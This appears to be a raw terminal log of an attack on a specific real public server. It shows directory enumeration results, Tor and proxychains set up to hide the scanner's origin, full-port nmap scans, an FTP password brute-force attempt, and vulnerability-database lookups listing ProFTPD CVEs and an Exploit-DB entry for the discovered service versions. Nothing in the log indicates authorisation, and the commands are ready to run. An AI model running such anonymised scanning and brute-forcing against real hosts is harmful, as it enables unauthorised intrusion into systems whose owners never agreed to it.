  1254. ---- Entering directory: http://184.154.192.250/blog/wp-admin/ ----
  1255. + http://184.154.192.250/blog/wp-admin/admin.php (CODE:302|SIZE:0)
  1256. + http://184.154.192.250/blog/wp-admin/admin.pl (CODE:403|SIZE:954)
  1257. + http://184.154.192.250/blog/wp-admin/index.php (CODE:302|SIZE:0)
  1258.  
  1259. ---- Entering directory: http://184.154.192.250/blog/wp-content/ ----
  1260. + http://184.154.192.250/blog/wp-content/admin.pl (CODE:403|SIZE:954)
  1261. + http://184.154.192.250/blog/wp-content/index.php (CODE:200|SIZE:0)
  1262.  
  1263. ---- Entering directory: http://184.154.192.250/blog/wp-includes/ ----
  1264. + http://184.154.192.250/blog/wp-includes/admin.pl (CODE:403|SIZE:954)
  1265. + http://184.154.192.250/blog/wp-includes/index.php (CODE:301|SIZE:0)
  1266.  
  1267. ---- Entering directory: http://184.154.192.250/Blog/0/ ----
  1268. + http://184.154.192.250/Blog/0/index.php (CODE:301|SIZE:0)
  1269.  
  1270. ---- Entering directory: http://184.154.192.250/Blog/2011/ ----
  1271. + http://184.154.192.250/Blog/2011/13 (CODE:200|SIZE:13756)
  1272. + http://184.154.192.250/Blog/2011/14 (CODE:200|SIZE:13756)
  1273. + http://184.154.192.250/Blog/2011/15 (CODE:200|SIZE:13756)
  1274. + http://184.154.192.250/Blog/2011/20 (CODE:200|SIZE:13756)
  1275. + http://184.154.192.250/Blog/2011/21 (CODE:200|SIZE:13756)
  1276. + http://184.154.192.250/Blog/2011/22 (CODE:200|SIZE:13756)
  1277. + http://184.154.192.250/Blog/2011/23 (CODE:200|SIZE:13756)
  1278. + http://184.154.192.250/Blog/2011/24 (CODE:200|SIZE:13756)
  1279. + http://184.154.192.250/Blog/2011/25 (CODE:200|SIZE:13756)
  1280. + http://184.154.192.250/Blog/2011/30 (CODE:200|SIZE:13756)
  1281. + http://184.154.192.250/Blog/2011/32 (CODE:200|SIZE:13756)
  1282. + http://184.154.192.250/Blog/2011/42 (CODE:200|SIZE:13756)
  1283. + http://184.154.192.250/Blog/2011/50 (CODE:200|SIZE:13756)
  1284. + http://184.154.192.250/Blog/2011/51 (CODE:200|SIZE:13756)
  1285. + http://184.154.192.250/Blog/2011/64 (CODE:200|SIZE:13756)
  1286. + http://184.154.192.250/Blog/2011/96 (CODE:200|SIZE:13756)
  1287. + http://184.154.192.250/Blog/2011/atom (CODE:301|SIZE:0)
  1288. + http://184.154.192.250/Blog/2011/index.php (CODE:301|SIZE:0)
  1289. + http://184.154.192.250/Blog/2011/page1 (CODE:301|SIZE:0)
  1290. + http://184.154.192.250/Blog/2011/page2 (CODE:301|SIZE:0)
  1291. + http://184.154.192.250/Blog/2011/rdf (CODE:301|SIZE:0)
  1292. + http://184.154.192.250/Blog/2011/rss (CODE:301|SIZE:0)
  1293. + http://184.154.192.250/Blog/2011/rss2 (CODE:301|SIZE:0)
  1294.  
  1295. ---- Entering directory: http://184.154.192.250/Blog/2012/ ----
  1296. + http://184.154.192.250/Blog/2012/13 (CODE:200|SIZE:13756)
  1297. + http://184.154.192.250/Blog/2012/14 (CODE:200|SIZE:13756)
  1298. + http://184.154.192.250/Blog/2012/15 (CODE:200|SIZE:13756)
  1299. + http://184.154.192.250/Blog/2012/20 (CODE:200|SIZE:13756)
  1300. + http://184.154.192.250/Blog/2012/21 (CODE:200|SIZE:13756)
  1301. + http://184.154.192.250/Blog/2012/22 (CODE:200|SIZE:13756)
  1302. + http://184.154.192.250/Blog/2012/23 (CODE:200|SIZE:13756)
  1303. + http://184.154.192.250/Blog/2012/24 (CODE:200|SIZE:13756)
  1304. + http://184.154.192.250/Blog/2012/25 (CODE:200|SIZE:13756)
  1305. + http://184.154.192.250/Blog/2012/30 (CODE:200|SIZE:13756)
  1306. + http://184.154.192.250/Blog/2012/32 (CODE:200|SIZE:13756)
  1307. + http://184.154.192.250/Blog/2012/42 (CODE:200|SIZE:13756)
  1308. + http://184.154.192.250/Blog/2012/50 (CODE:200|SIZE:13756)
  1309. + http://184.154.192.250/Blog/2012/51 (CODE:200|SIZE:13756)
  1310. + http://184.154.192.250/Blog/2012/64 (CODE:200|SIZE:13756)
  1311. + http://184.154.192.250/Blog/2012/96 (CODE:200|SIZE:13756)
  1312. + http://184.154.192.250/Blog/2012/atom (CODE:301|SIZE:0)
  1313. + http://184.154.192.250/Blog/2012/index.php (CODE:301|SIZE:0)
  1314. + http://184.154.192.250/Blog/2012/page1 (CODE:301|SIZE:0)
  1315. + http://184.154.192.250/Blog/2012/page2 (CODE:301|SIZE:0)
  1316. + http://184.154.192.250/Blog/2012/rdf (CODE:301|SIZE:0)
  1317. + http://184.154.192.250/Blog/2012/rss (CODE:301|SIZE:0)
  1318. + http://184.154.192.250/Blog/2012/rss2 (CODE:301|SIZE:0)
  1319.  
  1320. ---- Entering directory: http://184.154.192.250/Blog/embed/ ----
  1321. + http://184.154.192.250/Blog/embed/index.php (CODE:301|SIZE:0)
  1322.  
  1323. ---- Entering directory: http://184.154.192.250/Blog/feed/ ----
  1324. + http://184.154.192.250/Blog/feed/feed (CODE:301|SIZE:0)
  1325. + http://184.154.192.250/Blog/feed/index.php (CODE:301|SIZE:0)
  1326. + http://184.154.192.250/Blog/feed/rss (CODE:301|SIZE:0)
  1327. + http://184.154.192.250/Blog/feed/rss2 (CODE:301|SIZE:0)
  1328.  
  1329. ---- Entering directory: http://184.154.192.250/Blog/uncategorized/ ----
  1330. + http://184.154.192.250/Blog/uncategorized/atom (CODE:301|SIZE:0)
  1331. + http://184.154.192.250/Blog/uncategorized/index.php (CODE:301|SIZE:0)
  1332. + http://184.154.192.250/Blog/uncategorized/page1 (CODE:301|SIZE:0)
  1333. + http://184.154.192.250/Blog/uncategorized/rdf (CODE:301|SIZE:0)
  1334. + http://184.154.192.250/Blog/uncategorized/rss (CODE:301|SIZE:0)
  1335. + http://184.154.192.250/Blog/uncategorized/rss2 (CODE:301|SIZE:0)
  1336.  
  1337. ---- Entering directory: http://184.154.192.250/contact-us/_notes/ ----
  1338. + http://184.154.192.250/contact-us/_notes/admin.pl (CODE:403|SIZE:954)
  1339. + http://184.154.192.250/contact-us/_notes/atom (CODE:301|SIZE:0)
  1340. + http://184.154.192.250/contact-us/_notes/index.php (CODE:301|SIZE:0)
  1341. + http://184.154.192.250/contact-us/_notes/rdf (CODE:301|SIZE:0)
  1342. + http://184.154.192.250/contact-us/_notes/rss (CODE:301|SIZE:0)
  1343. + http://184.154.192.250/contact-us/_notes/rss2 (CODE:301|SIZE:0)
  1344.  
  1345. ---- Entering directory: http://184.154.192.250/feed/atom/ ----
  1346. + http://184.154.192.250/feed/atom/atom (CODE:301|SIZE:0)
  1347. + http://184.154.192.250/feed/atom/feed (CODE:301|SIZE:0)
  1348. + http://184.154.192.250/feed/atom/index.php (CODE:301|SIZE:0)
  1349. + http://184.154.192.250/feed/atom/rdf (CODE:301|SIZE:0)
  1350. + http://184.154.192.250/feed/atom/rss (CODE:301|SIZE:0)
  1351. + http://184.154.192.250/feed/atom/rss2 (CODE:301|SIZE:0)
  1352.  
  1353. ---- Entering directory: http://184.154.192.250/feed/rdf/ ----
  1354. + http://184.154.192.250/feed/rdf/atom (CODE:301|SIZE:0)
  1355. + http://184.154.192.250/feed/rdf/feed (CODE:301|SIZE:0)
  1356. + http://184.154.192.250/feed/rdf/index.php (CODE:301|SIZE:0)
  1357. + http://184.154.192.250/feed/rdf/rdf (CODE:301|SIZE:0)
  1358. + http://184.154.192.250/feed/rdf/rss (CODE:301|SIZE:0)
  1359. + http://184.154.192.250/feed/rdf/rss2 (CODE:301|SIZE:0)
  1360.  
  1361. ---- Entering directory: http://184.154.192.250/include/_notes/ ----
  1362. + http://184.154.192.250/include/_notes/admin.pl (CODE:403|SIZE:954)
  1363. + http://184.154.192.250/include/_notes/atom (CODE:301|SIZE:0)
  1364. + http://184.154.192.250/include/_notes/index.php (CODE:301|SIZE:0)
  1365. + http://184.154.192.250/include/_notes/rdf (CODE:301|SIZE:0)
  1366. + http://184.154.192.250/include/_notes/rss (CODE:301|SIZE:0)
  1367. + http://184.154.192.250/include/_notes/rss2 (CODE:301|SIZE:0)
  1368.  
  1369. ---- Entering directory: http://184.154.192.250/test/file/ ----
  1370. + http://184.154.192.250/test/file/admin.pl (CODE:403|SIZE:954)
  1371. + http://184.154.192.250/test/file/atom (CODE:301|SIZE:0)
  1372. + http://184.154.192.250/test/file/index.php (CODE:301|SIZE:0)
  1373. + http://184.154.192.250/test/file/rdf (CODE:301|SIZE:0)
  1374. + http://184.154.192.250/test/file/rss (CODE:301|SIZE:0)
  1375. + http://184.154.192.250/test/file/rss2 (CODE:301|SIZE:0)
  1376.  
  1377. ---- Entering directory: http://184.154.192.250/test/images/ ----
  1378. + http://184.154.192.250/test/images/admin.pl (CODE:403|SIZE:954)
  1379. + http://184.154.192.250/test/images/atom (CODE:301|SIZE:0)
  1380. + http://184.154.192.250/test/images/index.php (CODE:301|SIZE:0)
  1381. + http://184.154.192.250/test/images/rdf (CODE:301|SIZE:0)
  1382. + http://184.154.192.250/test/images/rss (CODE:301|SIZE:0)
  1383. + http://184.154.192.250/test/images/rss2 (CODE:301|SIZE:0)
  1384. + http://184.154.192.250/test/images/Thumbs.db (CODE:200|SIZE:27648)
  1385.  
  1386. ---- Entering directory: http://184.154.192.250/time/Image/ ----
  1387. + http://184.154.192.250/time/Image/admin.pl (CODE:403|SIZE:954)
  1388. + http://184.154.192.250/time/Image/atom (CODE:301|SIZE:0)
  1389. + http://184.154.192.250/time/Image/index.php (CODE:301|SIZE:0)
  1390. + http://184.154.192.250/time/Image/rdf (CODE:301|SIZE:0)
  1391. + http://184.154.192.250/time/Image/rss (CODE:301|SIZE:0)
  1392. + http://184.154.192.250/time/Image/rss2 (CODE:301|SIZE:0)
  1393.  
  1394. ---- Entering directory: http://184.154.192.250/uncategorized/feed/ ----
  1395. + http://184.154.192.250/uncategorized/feed/feed (CODE:301|SIZE:0)
  1396. + http://184.154.192.250/uncategorized/feed/index.php (CODE:301|SIZE:0)
  1397. + http://184.154.192.250/uncategorized/feed/rss (CODE:301|SIZE:0)
  1398. + http://184.154.192.250/uncategorized/feed/rss2 (CODE:301|SIZE:0)
  1399.  
  1400. ---- Entering directory: http://184.154.192.250/WEB-INF/classes/ ----
  1401. + http://184.154.192.250/WEB-INF/classes/admin.pl (CODE:403|SIZE:954)
  1402. + http://184.154.192.250/WEB-INF/classes/atom (CODE:301|SIZE:0)
  1403. + http://184.154.192.250/WEB-INF/classes/index.php (CODE:301|SIZE:0)
  1404. + http://184.154.192.250/WEB-INF/classes/rdf (CODE:301|SIZE:0)
  1405. + http://184.154.192.250/WEB-INF/classes/rss (CODE:301|SIZE:0)
  1406. + http://184.154.192.250/WEB-INF/classes/rss2 (CODE:301|SIZE:0)
  1407.  
  1408. ---- Entering directory: http://184.154.192.250/WEB-INF/lib/ ----
  1409. + http://184.154.192.250/WEB-INF/lib/admin.pl (CODE:403|SIZE:954)
  1410. + http://184.154.192.250/WEB-INF/lib/atom (CODE:301|SIZE:0)
  1411. + http://184.154.192.250/WEB-INF/lib/index.php (CODE:301|SIZE:0)
  1412. + http://184.154.192.250/WEB-INF/lib/rdf (CODE:301|SIZE:0)
  1413. + http://184.154.192.250/WEB-INF/lib/rss (CODE:301|SIZE:0)
  1414. + http://184.154.192.250/WEB-INF/lib/rss2 (CODE:301|SIZE:0)
  1415.  
  1416. ---- Entering directory: http://184.154.192.250/works/flash/ ----
  1417. + http://184.154.192.250/works/flash/admin.pl (CODE:403|SIZE:954)
  1418. + http://184.154.192.250/works/flash/atom (CODE:301|SIZE:0)
  1419. + http://184.154.192.250/works/flash/index.php (CODE:301|SIZE:0)
  1420. + http://184.154.192.250/works/flash/rdf (CODE:301|SIZE:0)
  1421. + http://184.154.192.250/works/flash/rss (CODE:301|SIZE:0)
  1422. + http://184.154.192.250/works/flash/rss2 (CODE:301|SIZE:0)
  1423.  
  1424. ---- Entering directory: http://184.154.192.250/works/images/ ----
  1425. + http://184.154.192.250/works/images/admin.pl (CODE:403|SIZE:954)
  1426. + http://184.154.192.250/works/images/atom (CODE:301|SIZE:0)
  1427.  
  1428.  
  1429.  
  1430. INSTALL TOR
  1431.  
  1432. root@blackbox:~# apt-get install tor
  1433.  
  1434. START TOR
  1435.  
  1436. root@blackbox:~# service tor start
  1437.  
  1438. CHECK TOR STATUS
  1439.  
  1440. root@blackbox:~# service tor status
  1441.  
  1442.  
  1443. CHECK IF ANONYMITY WORKS
  1444.  
  1445. root@blackbox:~# proxychains curl http://icanhazip.com
  1446. ProxyChains-3.1 (http://proxychains.sf.net)
  1447. |DNS-request| icanhazip.com
  1448. |S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK
  1449. |DNS-response| icanhazip.com is 104.20.16.242
  1450. |S-chain|-<>-127.0.0.1:9050-<><>-104.20.16.242:80-<><>-OK
  1451. 89.234.157.254
  1452.  
  1453.  
  1454. START NMAP THROUGH PROXYCHAINS
  1455.  
  1456. root@blackbox:/opt# proxychains nmap -p 1-65535 -T4 -A -v 184.154.192.250 -Pn --open
  1457.  
  1458. Discovered open port 443/tcp on 184.154.192.250
  1459. Discovered open port 110/tcp on 184.154.192.250
  1460. Discovered open port 995/tcp on 184.154.192.250
  1461. Discovered open port 53/tcp on 184.154.192.250
  1462. Discovered open port 111/tcp on 184.154.192.250
  1463. Discovered open port 554/tcp on 184.154.192.250
  1464. Discovered open port 143/tcp on 184.154.192.250
  1465. Discovered open port 22/tcp on 184.154.192.250
  1466. Discovered open port 25/tcp on 184.154.192.250
  1467. Discovered open port 993/tcp on 184.154.192.250
  1468. Discovered open port 3306/tcp on 184.154.192.250
  1469. Discovered open port 80/tcp on 184.154.192.250
  1470. Discovered open port 587/tcp on 184.154.192.250
  1471. Discovered open port 21/tcp on 184.154.192.250
  1472. Discovered open port 106/tcp on 184.154.192.250
  1473. Discovered open port 746/tcp on 184.154.192.250
  1474. Discovered open port 7070/tcp on 184.154.192.250
  1475. Discovered open port 8443/tcp on 184.154.192.250
  1476. Discovered open port 465/tcp on 184.154.192.250
  1477. Discovered open port 8880/tcp on 184.154.192.250
  1478.  
  1479.  
  1480. NMAP NSE FTP
  1481.  
  1482. root@blackbox:/opt# ls /usr/share/nmap/scripts/ | grep ftp
  1483. ftp-anon.nse
  1484. ftp-bounce.nse
  1485. ftp-brute.nse
  1486. ftp-libopie.nse
  1487. ftp-proftpd-backdoor.nse
  1488. ftp-syst.nse
  1489. ftp-vsftpd-backdoor.nse
  1490. ftp-vuln-cve2010-4221.nse
  1491. tftp-enum.nse
  1492.  
  1493. root@blackbox:/opt# proxychains nmap -oN ftp.nmap --script "ftp-brute" --script-args= -d -Pn -v -p 21 184.154.192.250
  1494.  
  1495. PORT STATE SERVICE REASON
  1496. 21/tcp open ftp syn-ack ttl 49
  1497. | ftp-brute:
  1498. | Accounts: No valid accounts found
  1499. |_ Statistics: Performed 563 guesses in 618 seconds, average tps: 1.1
  1500. Final times for host: srtt: 145410 rttvar: 145410 to: 727050
  1501.  
  1502.  
  1503. root@blackbox:~# nmap -sV -Pn 184.154.192.250 --open
  1504. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:21 CST
  1505. Nmap scan report for server.etours.cn (184.154.192.250)
  1506. Host is up (0.15s latency).
  1507. Not shown: 981 closed ports, 1 filtered port
  1508. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1509. PORT STATE SERVICE VERSION
  1510. 21/tcp open ftp ProFTPD 1.3.3e
  1511. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  1512. 25/tcp open smtp qmail smtpd
  1513. 53/tcp open domain (unknown banner: none)
  1514. 80/tcp open http Apache httpd (PleskLin)
  1515. 106/tcp open pop3pw poppassd
  1516. 110/tcp open pop3 Courier pop3d
  1517. 111/tcp open rpcbind 2 (RPC #100000)
  1518. 143/tcp open imap Courier Imapd (released 2004)
  1519. 443/tcp open ssl/https?
  1520. 465/tcp open ssl/smtps?
  1521. 554/tcp open tcpwrapped
  1522. 587/tcp open smtp qmail smtpd
  1523. 993/tcp open ssl/imaps?
  1524. 995/tcp open ssl/pop3s?
  1525. 3306/tcp open mysql MySQL 5.0.77
  1526. 7070/tcp open tcpwrapped
  1527. 8443/tcp open ssl/https-alt sw-cp-server
  1528. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  1529. SF-Port53-TCP:V=7.80%I=7%D=1/22%Time=5E28AEC7%P=x86_64-pc-linux-gnu%r(DNSV
  1530. SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
  1531. SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
  1532. SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
  1533. Service Info: Host: localhost.localdomain; OS: Unix
  1534.  
  1535. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1536. Nmap done: 1 IP address (1 host up) scanned in 39.36 seconds
  1537.  
  1538.  
  1539. root@blackbox:/opt# cd /usr/share/nmap/scripts/
  1540. root@blackbox:/usr/share/nmap/scripts# git clone https://github.com/vulnersCom/nmap-vulners.git
  1541. root@blackbox:/usr/share/nmap/scripts# git clone https://github.com/scipag/vulscan.git
  1542. root@blackbox:/usr/share/nmap/scripts# ls -la vulscan/*.csv
  1543. -rw-r--r-- 1 root root 16756993 Jan 21 04:59 vulscan/cve.csv
  1544. -rw-r--r-- 1 root root 1864748 Jan 21 04:59 vulscan/exploitdb.csv
  1545. -rw-r--r-- 1 root root 1524310 Jan 21 04:59 vulscan/openvas.csv
  1546. -rw-r--r-- 1 root root 6718903 Jan 21 04:59 vulscan/osvdb.csv
  1547. -rw-r--r-- 1 root root 7001128 Jan 21 04:59 vulscan/scipvuldb.csv
  1548. -rw-r--r-- 1 root root 7227028 Jan 21 04:59 vulscan/securityfocus.csv
  1549. -rw-r--r-- 1 root root 1826138 Jan 21 04:59 vulscan/securitytracker.csv
  1550. -rw-r--r-- 1 root root 4576711 Jan 21 04:59 vulscan/xforce.csv
  1551.  
  1552. root@blackbox:/usr/share/nmap/scripts# cd vulscan/
  1553. root@blackbox:/usr/share/nmap/scripts/vulscan# cd utilities/
  1554. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities# cd updater/
  1555. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# chmod +x updateFiles.sh
  1556. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# ./updateFiles.sh
  1557. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/cve.csv...
  1558. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/exploitdb.csv...
  1559. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/openvas.csv...
  1560. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/osvdb.csv...
  1561. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/scipvuldb.csv...
  1562. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/securityfocus.csv...
  1563. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/securitytracker.csv...
  1564. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/xforce.csv...
  1565. Returning 0, as no files have been updated, but script ran successfully
  1566.  
  1567.  
  1568. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# cd ..
  1569. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities# cd ..
  1570. root@blackbox:/usr/share/nmap/scripts/vulscan# cd ..
  1571.  
  1572.  
  1573. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners -sV -p21 184.154.192.250
  1574. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1575. Nmap scan report for server.etours.cn (184.154.192.250)
  1576. Host is up (0.037s latency).
  1577.  
  1578. PORT STATE SERVICE VERSION
  1579. 21/tcp open ftp ProFTPD 1.3.3e
  1580. Service Info: OS: Unix
  1581.  
  1582. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1583. Nmap done: 1 IP address (1 host up) scanned in 4.06 seconds
  1584.  
  1585. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners -sV -p22 184.154.192.250
  1586. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1587. Nmap scan report for server.etours.cn (184.154.192.250)
  1588. Host is up (0.036s latency).
  1589.  
  1590. PORT STATE SERVICE VERSION
  1591. 22/tcp open tcpwrapped
  1592.  
  1593. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1594. Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds
  1595.  
  1596.  
  1597. root@blackbox:/usr/share/nmap/scripts# nmap --script vulscan -sV -p21 184.154.192.250
  1598. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1599. Nmap scan report for server.etours.cn (184.154.192.250)
  1600. Host is up (0.036s latency).
  1601.  
  1602. PORT STATE SERVICE VERSION
  1603. 21/tcp open ftp ProFTPD 1.3.3e
  1604. | vulscan: VulDB - https://vuldb.com:
  1605. | [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
  1606. | [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
  1607. | [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
  1608. | [138380] ProFTPD 1.3.5b mod_copy Code Execution
  1609. | [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
  1610. | [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
  1611. | [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
  1612. | [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
  1613. | [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
  1614. | [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
  1615. | [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
  1616. | [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
  1617. | [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
  1618. | [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
  1619. | [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
  1620. | [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
  1621. | [33495] ProFTPD 1.3.0a Configuration File affected denial of service
  1622. | [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
  1623. | [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
  1624. |
  1625. | MITRE CVE - https://cve.mitre.org:
  1626. | [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
  1627. | [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
  1628. | [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
  1629. | [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
  1630. | [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
  1631. | [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
  1632. | [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
  1633. | [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
  1634. | [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
  1635. | [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
  1636. | [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
  1637. | [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
  1638. | [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
  1639. | [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
  1640. | [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
  1641. | [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
  1642. | [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
  1643. | [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
  1644. |
  1645. | SecurityFocus - https://www.securityfocus.com/bid/:
  1646. | [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  1647. |
  1648. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  1649. | [80980] ProFTPD FTP commands symlink
  1650. | [71226] ProFTPD pool code execution
  1651. | [65207] ProFTPD mod_sftp module denial of service
  1652. | [64495] ProFTPD sql_prepare_where() buffer overflow
  1653. | [63658] ProFTPD FTP server backdoor
  1654. | [63407] mod_sql module for ProFTPD buffer overflow
  1655. | [63155] ProFTPD pr_data_xfer denial of service
  1656. | [62909] ProFTPD mod_site_misc directory traversal
  1657. | [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
  1658. | [53936] ProFTPD mod_tls SSL certificate security bypass
  1659. | [48951] ProFTPD mod_sql username percent SQL injection
  1660. | [48558] ProFTPD NLS support SQL injection protection bypass
  1661. | [45274] ProFTPD URL cross-site request forgery
  1662. | [33733] ProFTPD Auth API security bypass
  1663. | [31461] ProFTPD mod_radius buffer overflow
  1664. | [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
  1665. | [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
  1666. | [30147] ProFTPD sreplace() buffer overflow
  1667. | [21530] ProFTPD mod_sql format string attack
  1668. | [21528] ProFTPD shutdown message format string attack
  1669. | [19410] GProFTPD file name format string attack
  1670. | [18453] ProFTPD SITE CHGRP command allows group ownership modification
  1671. | [17724] ProFTPD could allow an attacker to obtain valid accounts
  1672. | [16038] ProFTPD CIDR entry ACL bypass
  1673. | [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
  1674. | [12369] ProFTPD mod_sql SQL injection
  1675. | [12200] ProFTPD ASCII file newline buffer overflow
  1676. | [10932] ProFTPD long PASS command buffer overflow
  1677. | [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
  1678. | [7818] ProFTPD ls &quot
  1679. | [7816] ProFTPD file globbing denial of service
  1680. | [7126] ProFTPD fails to resolve hostnames
  1681. | [6433] ProFTPD format string
  1682. | [6209] proFTPD /var symlink
  1683. | [6208] ProFTPD contains configuration error in postinst script when running as root
  1684. | [5801] proftpd memory leak when using SIZE or USER commands
  1685. | [5737] ProFTPD system using mod_sqlpw unauthorized access
  1686. |
  1687. | Exploit-DB - https://www.exploit-db.com:
  1688. | [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
